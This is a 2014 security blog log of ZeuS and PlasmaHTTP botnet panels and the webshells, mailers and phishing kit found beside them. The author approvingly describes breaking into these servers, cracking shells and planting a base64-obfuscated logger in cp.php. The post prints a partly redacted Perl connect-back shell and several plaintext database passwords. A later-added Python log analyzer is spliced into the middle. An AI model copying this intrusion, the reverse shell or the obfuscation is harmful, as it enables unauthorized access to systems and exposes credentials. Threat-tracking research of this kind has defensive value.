Thursday, January 30, 2014

PlasmaHTTP botnet on

PlasmaHTTP botnet and other junk on

Plasma bot is Windows-based malware that uses HTTP to communicate with its command-and-control server. Its primary functions are stealing credentials and DDoS. Not very sophisticated, but it gets the job done for many skids. - Hosting24 Servers, US



Main page:
~450 bots

Running commands:
bot.update java-update.exe [X] 
miner.start *-a scrypt -o stratum+tcp:// -O Djurres.2:x -t 4* [X] 
miner.gpu.start *-a scrypt -o stratum+tcp:// -u Djurres.1 -p x -g yes* [X] 
wait [X]

Real Fact: Mining for Bitcoin has huge profit margins. (These are scrypt miners pointed at a stratum pool, so it isn't even Bitcoin; Bitcoin uses SHA-256.)
CPU and GPU ?!?! Woah bro. 1337.

DDoS? uber cool! 


Password log:

Ok, now this is the pathetic part.
I almost felt bad taking this botnet down.

Yes, that is a directory called "A Hackers Folder"

His pet RAT collection:

And a library of eBooks on how to 'spread' his shitty public copy of Plasma bot. 

I thought I pulled a sample that the update script was running, but I guess not.

bot.update java-update.exe [X] 

It's too late now anyway.

Xzibit says:
actually, you have some eBooks to read ... so sad.

hosting ZeuS (2x botnets)

C&C listed on ZeuS Tracker.

(117 bots) - Most from India


OS Stats:

(50 bots) - Most from India

C999shell and Bitcoin miner ELF:

C999 Shell
Awesome c99 mod bro...

WSO 2.5 Shell


Sorry, playtime is over for you. 

Pretty standard, nothing too interesting.

Thursday, January 16, 2014


New ZeuS build has leaked and is starting to be seen in the field.

Same capabilities as earlier versions, plus a new "Modules Parser" (iBank).
This feature scans the bot host for banking-related processes and banking client applications, hooks those processes and attempts to steal credentials from them.

Panel found via ZeuS Tracker
ECATEL, Netherlands


Modules parser:

Script running:


VT: (21/46)

List of users:

admin - Enabled - Default user


This botnet is run by the same guys seen here:

and here:

This server is now offline.


Monday, January 13, 2014 - shells and DoS and phishing, oh my

Started with a WSO shell. Cracked into it.

Found all sorts of hideous junk on here, including a Credit Agricole (French bank) phishing kit:
WSO shell
ICH Th3 Unkn0wn MySQL interface
Priv8 shell
Symlink Sa 2 panel
Dangerous Mailer
VNShell DDoS shell
K2LL33d shell (a b374k shell mod)
RootDaBitch tool (brute forces local accounts using su)
Credit Agricole phishing kit

Ok, lets have a look.

(this was something like the 3rd WSO I found in here...seriously??)

MySQL Interface mod

Priv8 Shell
It literally tells me the password to the shell is 'priv8'

...and the password works. What an ugly piece of garbage too!

Symlink Panel
Symlink shared hosting directories to one place and mass deface.

Domains list, but the symlinks aren't working. Sorry buddy.
This thing stopped being useful a while ago.

Dangerous Mailer
Login to mailer panel.

Long view of Dangerous Mailer

VNShell Flooder
(because DoS is hacking)
This is the type of stuff they teach you at HackForums.
Oh yeah, and this isn't even a shell, even though it's called a shell.

Select the attack type

Target, http file, attack time

Does it look like b374k shell (below)?
Yes, that's because this skilled hacker just changed a few lines of code and called it his own work.
v3ry sw33t

If your eyes aren't already bleeding, get a load of this.

TurkBlackhats Shell

b374k shell (1923Turk)

RootDaBitch brute-forces su to gain elevated privileges; under the hood it uses sucrack.

Directory listing of the kit, showing Bash script, password txt and screenshots?

Oh yes, because I don't know how to run a bash script, nor would there be useful info in the script source code either...sigh.

Not one, but two screenshots!
This one proves that he got in !! Wow cool. Fuck you.
Thanks "The Breacher" that was really helpful to me and my fellow skids. 

(Shake my head)

More things that are not that interesting and pretty useless but someone decided to spend time working on anyway:

PHP mailer, no panel, POST method (comments translated from Portuguese):
/* Form variables */
$nome = trim(@$_POST['nome']);            /* receives the data typed into the "nome" (name) field */
$email = trim(@$_POST['email']);          /* receives the data typed into the "email" field */
$assunto_user = trim(@$_POST['assunto']); /* receives the data typed into the "assunto" (subject) field */
$mensagem = trim(@$_POST['mensagem']);    /* receives the data typed into the "mensagem" (message) field */

Perl back connect (redacted where marked):
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
[...redacted]
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  [...redacted]
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "[*] Datached\n\n";

Last but not least.

Credit Agricole phishing kit -
Includes js, php, images, etc. for phishing site.
Bad guys redirect victim traffic to a kit like this in an effort to steal login credentials.
Crédit Agricole S.A. is the largest retail banking group in France, second largest in Europe and the eighth largest in the world by Tier 1 capital according to The Banker magazine. 
Phishing pages:

I deleted all of this junk. All the shells, phishing pages, mailers, DoS 'shell'.. all of it.  I emailed the admins too. operacional[at]

Sunday, January 12, 2014

ZeuS -

Found C&C via ZeuS Tracker.

Panel was at:

46 bots
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'inlandbe_ama';
$config['mysql_pass'] = '1qaz2wsx';
$config['mysql_db'] = 'inlandbe_ama';

Running script:

Admin was moving bots to ZeuS

This is from the same admins researched here.

a.exe - ZeuS

ZeuS Botnet hosted on:
Linux 2.6.18-194.26.1.el5

network:IP-Network-Block: -

(144 bots)

 OS Statistics

 TLD index is broken Wordpress


(144 bots)
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stn';

(0 bots)
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stnfrn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stnfrn';

user_execute hxxp://

Moving to ZeuS


Saturday, January 11, 2014

Patching ZeuS cp.php to track botnet administrators

This "patch" is straightforward. Not the most pretty method but it works for this job.

cp.php is the main control panel page used to administer a ZeuS botnet. Every time you want to check files for stolen credentials or send commands to the botnet, you go through cp.php.

Since this is the only PHP file used for access and administration, it is the best file to patch for tracking: every operator session has to hit it.

Looked around on Google because I'm lazy and don't need to reinvent the wheel. I found this (modified a bit):

// Append one line per request: who, when, which URL/script, and which browser.
$file     = 'sysfile.dat';
$ipadress = $_SERVER['REMOTE_ADDR'];
$date     = date('d/F/Y H:i:s');   // 24-hour clock; the snippet as found used 'h' (12-hour, no am/pm), which gives ambiguous times
$webpage  = $_SERVER['SCRIPT_NAME'];
$url      = $_SERVER['REQUEST_URI'];
$browser  = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '-';
$fp = fopen($file, 'a');
if ($fp) {
    flock($fp, LOCK_EX);   // two concurrent panel requests must not interleave half-lines
    fwrite($fp, $ipadress.' - ['.$date.'] '.$url.' '.$webpage.' '.$browser."\r\n");
    flock($fp, LOCK_UN);
    fclose($fp);
}

Encode it in Base64 to be "stealthy", i.e. wrap it in the usual eval(base64_decode('...')) one-liner so a quick look at cp.php doesn't show an obvious logger. (Anyone who actually reads the file will recognise that one-liner as a red flag, but it's enough for this job.)


Insert this code in cp.php, save, and it's now patched and ready to log activity!

Here is an example log for a ZeuS botnet that I was tracking.

ZeuS C&C via Google Dorks and tracking ZeuS Admins -

Over the weekend I found some ZeuS C&Cs using Google.

Most command and control servers found using dorks are offline now, but not all. This one was still active and getting larger.

I had an idea to "patch" cp.php so that I could track the guys who admin this.

ZeuS C&C
Uname: Linux 2.6.18-448.16.1.el5.lve0.8.70PAE

OriginAS:       AS36444, AS2828
NetName:        ACENETMI

3x ZeuS botnets hosted:

(357 bots)
OS Statistics:
Search for Files:

Summary page from last week, showing 331 bots.

Options & Encryption Key:

named botnets: vti, will, txt

hxxp:// (RU language set on Panel)
32 bots, Active since Aug 2013 (txt)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_biterel';
$config['mysql_pass'] = 'h7Uu6wpW9A%s';
$config['mysql_db'] = 'bitereli_bitereli';

10 bots (will)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_bits';
$config['mysql_pass'] = 'Go;vEI-;le94';
$config['mysql_db'] = 'bitereli_biterel';

350+ bots (vti)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_admin';
$config['mysql_pass'] = '@ph;yiTpFg}?';
$config['mysql_db'] = 'bitereli_admin';

A shell was here:

Used the shell to patch cp.php as discussed in this post. 

Here is the access log for this ZeuS botnet.

Admin IP and ISP:
- Blackberry UK RIM
- Blackberry UK RIM
- Blackberry UK RIM
- AirTel Nigeria
- AirTel Nigeria
- AirTel Nigeria
- Globacom Nigeria
- Globacom Nigeria
- Globacom Nigeria

We can clearly see who was working on this botnet. We have access from two mobile carrier networks in Nigeria (AirTel and Globacom), where the user agent showed Windows 7 with Firefox, and from a BlackBerry via RIM's UK network. One caveat: BlackBerry browser traffic of that era was proxied through RIM's own infrastructure, so a "Blackberry UK RIM" source address tells you the handset's traffic exited in the UK, not that its owner was there; it may well be the same Nigerian operator on a phone. The user agent is the more reliable signal for counting distinct devices.

Law enforcement should be able to use these access logs as evidence against the admins, or at least as a clue to who is behind this.
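A small analyzer for the log that the patched cp.php writes, covering both the patching post above (January 11) and the access-log analysis in this one. This is an added example, not code from the original post: it assumes the line format the snippet produces (IP - [date] request URI, script name, User-Agent; it parses the 12-hour 'h' of the snippet as found just as well as a 24-hour 'H'), and the sample lines are constructed with RFC 5737 test addresses, not the real ones from this case. It does what the post does by eye: group hits by source IP and coarse user-agent family so that several carrier IPs with one browser fingerprint collapse into one operator profile.

```python
import re
from datetime import datetime

# Constructed sample lines in the format the patched cp.php writes:
#   <REMOTE_ADDR> - [<d/F/Y H:i:s>] <REQUEST_URI> <SCRIPT_NAME> <User-Agent>
# Addresses, times and paths are made up for this example (RFC 5737 test ranges).
SAMPLE_LOG = """\
203.0.113.7 - [11/January/2014 09:12:41] /panel/cp.php?m=home /panel/cp.php Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
203.0.113.7 - [11/January/2014 09:13:02] /panel/cp.php?m=botnet_bots /panel/cp.php Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
198.51.100.20 - [11/January/2014 14:40:10] /panel/cp.php?m=reports_db /panel/cp.php BlackBerry9900/7.1.0.580 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/102
203.0.113.7 - [12/January/2014 08:01:55] /panel/cp.php?m=botnet_scripts /panel/cp.php Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
192.0.2.33 - [12/January/2014 22:17:09] /panel/cp.php?m=home /panel/cp.php Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
garbage line that does not match
"""

# The User-Agent is the only field that may contain spaces, so it takes the rest of the line.
LINE_RE = re.compile(
    r"^(?P<ip>\S+) - \[(?P<ts>[^\]]+)\] (?P<uri>\S+) (?P<script>\S+) (?P<ua>.*)$"
)


def parse_line(line):
    """Parse one logger line into a dict, or return None for a line that isn't in the format."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    rec = m.groupdict()
    # %H accepts 00-23, so a log written with PHP's 12-hour 'h' (01-12) parses too.
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%B/%Y %H:%M:%S")
    return rec


def ua_family(ua):
    """Reduce a User-Agent to a coarse platform/browser label used for grouping."""
    if "BlackBerry" in ua:
        platform = "BlackBerry"
    elif "Windows NT 6.1" in ua:
        platform = "Windows 7"
    elif "Windows" in ua:
        platform = "Windows"
    elif "Linux" in ua:
        platform = "Linux"
    else:
        platform = "other"
    browser = next((b for b in ("Firefox", "Chrome", "Opera") if b in ua), "other")
    return f"{platform}/{browser}"


def summarize(log_text):
    """Group hits by (source IP, UA family): hit count, first/last seen, panel pages touched."""
    profiles = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip anything that isn't a logger line
        key = (rec["ip"], ua_family(rec["ua"]))
        p = profiles.setdefault(
            key, {"hits": 0, "first": rec["ts"], "last": rec["ts"], "pages": set()}
        )
        p["hits"] += 1
        p["first"] = min(p["first"], rec["ts"])
        p["last"] = max(p["last"], rec["ts"])
        p["pages"].add(rec["uri"])
    return profiles


def operator_count(profiles):
    """Distinct UA families: a rough lower bound on the number of devices/people involved.
    Many IPs sharing one UA family is what a mobile carrier rotating addresses looks like,
    and a BlackBerry exiting via RIM's proxy says little about where the handset really is."""
    return len({ua for (_ip, ua) in profiles})


if __name__ == "__main__":
    profiles = summarize(SAMPLE_LOG)
    for (ip, ua), p in sorted(profiles.items(), key=lambda kv: kv[1]["first"]):
        print(f"{ip:15} {ua:20} hits={p['hits']} first={p['first']} last={p['last']} pages={sorted(p['pages'])}")
    print("distinct operator profiles by UA family:", operator_count(profiles))
```

Run it against the real sysfile.dat by passing the file's contents to summarize() instead of SAMPLE_LOG; the time window per profile (first/last seen) is what lines up with carrier records if law enforcement ever asks for them.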

Friday, January 10, 2014

ZeuS hosted on

ZeuS C&C hosted on:

519 bots (315 from India)



 OS Statistics:

Now it's 403 Forbidden.
Good stuff.